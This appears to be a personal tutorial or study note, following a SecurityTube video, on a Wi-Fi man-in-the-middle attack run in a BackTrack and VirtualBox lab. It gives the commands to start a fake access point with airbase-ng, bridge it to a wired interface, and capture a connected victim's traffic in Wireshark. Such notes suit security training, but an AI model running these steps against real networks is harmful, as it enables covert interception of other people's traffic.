Vivek’s video is here.
In the unencrypted man in the middle attack, we deauth the client from the regular AP and reconnect it to our own fake AP.
We can either connect the client to a new wired (or 3G) internet connection or we can connect back to the real AP.
In our setup we’re going to get our victim to connect to our fake AP, and then send the traffic out to the internet via a different access point.
We’ll use the alfa card to create a fake AP. We’ll use the laptops built in wifi card to connect to our other AP.
0. Setup your network card in VirtualBox/VMWare, using “NAT” is probably your best option.
1. Bring up eth0 in backtrack
ifconfig eth0 up
2. Bring up an access point with SSID SecurityTube
ifconfig wlan0 up airmon-ng start wlan0 iwconfig wlan0 channel 1 airbase-ng -ssid SecurityTube mon0
3. Bridge the interfaces
Run this in a new terminal window:
ifconfig at0 up brctl addbr mitm brctl show #will show the bridge, but no interfaces added brctl addif mitm eth0 brctl addif mitm at0 ifconfig eth0 0.0.0.0 up #not sure why this is needed! ifconfig at0 0.0.0.0 up
If you do ifconfig, you’ll see a new bridge, mitm. Bring up the interface:
ifconfig mitm dhclient3 mitm
The dhclient command, gets an IP address, this will come from the virtualbox dhcp server.
4. Go to the airbase-ng window. Connect a device to the fake network you created.
The device will get a IP address from VirtualBox.
5. Open up wireshark, start a capture on at0. Open a webpage on your client.
You should see a lot of traffic in wireshark. You should be able to view pages on your client via the laptops internet connect.
All packets have to go though us, this is a little better than passively sniffing cleartext packets and all packets /MUST/ go through us.